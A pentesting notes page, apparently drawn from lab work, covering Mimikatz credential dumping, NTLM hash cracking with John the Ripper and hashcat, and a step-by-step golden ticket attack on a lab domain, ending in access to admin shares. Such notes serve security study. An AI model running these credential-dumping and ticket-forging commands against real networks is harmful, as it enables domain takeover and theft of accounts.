Mimikatz

Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of a active directory network.

The idea is take that credentials (hashes) and try to crack them.

GitHub - gentilkiwi/mimikatz: A little tool to play with Windows securityGitHub

Run mimikatz

.\mimikatz.exe

Run mimikatz as Administrator

Inside mimikatz interaction, we run:

privilege::debug

Extract NTLM hashes

lsadump::lsa /patch

Crack NTLM hashes

➧ cat mimikatz-ntlm.hashes 
Administrator:2777b7fec870e04dda00cd7260f7bee6
krbtgt:5508500012cc005cf7082a9a89ebdfdf
[...]

Identify hash type

➧ haiti '2777b7fec870e04dda00cd7260f7bee6'
NTLM [HC: 1000] [JtR: nt]

John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT mimikatz-ntlm.hashes

Hashcat

hashcat -a 0 -m 1000 mimikatz-ntlm.hashes /usr/share/wordlists/rockyou.txt --username --show -o cracked-mimikatz-ntlm.hashes

--username: To specify to hashcat that our hash file contains usernames or emails.
--show: To save the output like USER:HASH:PLAIN

Golden ticket attack

Ataque Golden Ticket y cómo mitigarloTrustDimension

Golden Ticket Attack Explained - MITRE ATT&CK T1558.001Picus Security

Extract info about krbtgt (Kerberos Ticket Granting Ticket account)

We will first dump the hash and sid of the krbtgt user then create a golden ticket and use that golden ticket to open up a new command prompt allowing us to access any machine on the network.

lsadump::lsa /inject /name:krbtgt

This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket.

Generating ticket

kerberos::golden /user: /domain: /sid: /krbtgt: /id:

kerberos::golden /user:Administrator /domain:CONTROLLER.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

/id:500 =

S-1-5-domain-500

Administrator

Cuenta de usuario para el administrador del sistema. Cada equipo tiene una cuenta de administrador local y cada dominio tiene una cuenta de administrador de dominio. La cuenta de administrador es la primera cuenta creada durante la instalación del sistema operativo. La cuenta no se puede eliminar, deshabilitar ni bloquear, pero se puede cambiar el nombre. De forma predeterminada, la cuenta de administrador es miembro del grupo Administradores y no se puede quitar de ese grupo.

Identificadores de seguridadMicrosoftLearn

Accessing to machines

To enable complete privileges over all the machines:

misc::cmd

And then we have access:

dir \\Desktop-1\c$
dir \\Machine2\c$

PreviousPersistence NextCommon used tools

Last updated 1 year ago

hashtagRun mimikatz

hashtagRun mimikatz as Administrator

hashtagExtract NTLM hashes

hashtagCrack NTLM hashes

hashtagIdentify hash type

hashtagJohn the Ripper

hashtagHashcat

hashtagGolden ticket attack

hashtagExtract info about krbtgt (Kerberos Ticket Granting Ticket account)

hashtagGenerating ticket

hashtagAccessing to machines